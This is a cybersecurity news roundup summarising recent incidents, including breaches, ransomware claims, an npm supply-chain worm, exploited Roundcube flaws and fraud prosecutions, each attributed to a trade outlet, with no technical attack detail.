In today’s cybersecurity news…
140k affected by US healthcare breach
Nearly 140,000 people were affected by a data breach tied to South Carolina-based Vikor Scientific, now rebranded as Vanta Diagnostics, according to the US Department of Health and Human Services. The Everest ransomware group claimed responsibility for the November incident, but the breach appears to have originated at Catalyst RCM, a revenue cycle management provider that detected compromised credentials in its file management system. Exposed data included names, dates of birth, payment card details, medical information, and health insurance information. (SecurityWeek)
Data advocates warn against replicating humans
Data protection authorities from 61 countries, including many across Europe, Canada, South Korea, the UAE, Mexico, Argentina, and Peru, are warning generative AI companies to prevent systems from creating realistic images or videos of identifiable people without consent. This follows backlash over the Grok chatbot generating millions of “nudified” images of real individuals. The regulators want safeguards against nonconsensual intimate imagery, defamatory content, cyberbullying, and child exploitation. U.K. Prime Minister Keir Starmer also announced plans to require platforms to remove nonconsensual intimate images within 48 hours or face fines of up to 10% of global revenue. (The Record)
Shai-Hulud-like worm targets developers
Researchers at Socket uncovered a supply chain worm dubbed SANDWORM_MODE spreading through at least 19 malicious npm packages published under two aliases. It uses typosquatting to mimic popular Node.js and AI development tools, executing hidden multi stage payloads that steal developer and CI credentials, crypto keys, and API tokens. It also targets AI coding assistants by injecting rogue MCP servers into tools like Claude Desktop, Cursor, and VS Code Continue, harvesting secrets from local environments. npm, GitHub, and Cloudflare have removed the malicious infrastructure, and affected developers are advised to rotate credentials and audit repositories and CI workflows. (Infosecurity Magazine)
Suspected Anonymous members detained in Spain
Spanish police arrested four suspected members of Anonymous Fénix for allegedly launching DDoS attacks against government ministries, political parties, and public institutions following the deadly 2024 DANA floods, which killed more than 230 people. The group claimed the government was responsible for mishandling the disaster. Authorities seized the group’s X, YouTube, and Telegram accounts, and said several attacks were successful. (The Register)
Huge thanks to our sponsor, Adaptive Security
RoundCube flaws exploited in attacks
CISA has added two recently patched Roundcube Webmail flaws, a critical remote code execution bug, and an unauthenticated XSS vulnerability, to its Known Exploited Vulnerabilities catalog, warning they are being actively abused in attacks. Federal agencies have been ordered to patch within three weeks, by March 13th. Roundcube is widely used via cPanel and has more than 46,000 internet exposed instances. Its vulnerabilities have previously been targeted by cybercrime and Russian state linked groups. (BleepingComputer)
Fraud investigation reveals Python malware
A fraud investigation into unauthorized PayPal transfers uncovered a sophisticated Python based malware campaign involving obfuscation, disposable infrastructure, and commercial hacking tools. Researchers at Secuinfra found the infection used hidden PowerShell commands to download a fake svchost executable from infrastructure linked to Tencent, establish persistence, and deploy a concealed Python environment. Memory forensics revealed heavily obfuscated payloads, including XWorm RAT, HTran, and Cobalt Strike Beacon, along with credential theft targeting browser autofill data and crypto wallets. The system was deemed fully compromised, though the initial infection vector remains unknown, with phishing or malicious downloads suspected. (InfoSecurity)
Ukrainian heads to US prison for aiding North Korean IT fraud
Ukrainian national Oleksandr Didenko was sentenced to five years in US prison for selling stolen US identities to North Korean IT workers and helping operate laptop farms that let them secure remote jobs at US companies. Through the Upworksell.com domain, Didenko managed 871 proxy identities and facilitated payments and access to the US financial system, letting overseas workers earn hundreds of thousands of dollars from about 40 US firms. He pleaded guilty to wire fraud conspiracy and aggravated identity theft, agreed to forfeit more than $1.4 million, and was ordered to pay restitution after being extradited from Poland. (SecurityWeek)
Air Côte d’Ivoire confirms cyberattack
The airline Air Côte d’Ivoire confirmed it was hit by a cyberattack on February 8th after the INC ransomware gang claimed it stole 208 GB of data and demanded payment by February 24th. The airline said parts of its information systems were affected and that it notified French and Ivorian authorities while investigators assess the scope of the breach. Flights continue to operate normally. The INC gang has previously targeted government entities and US municipalities. (The Record)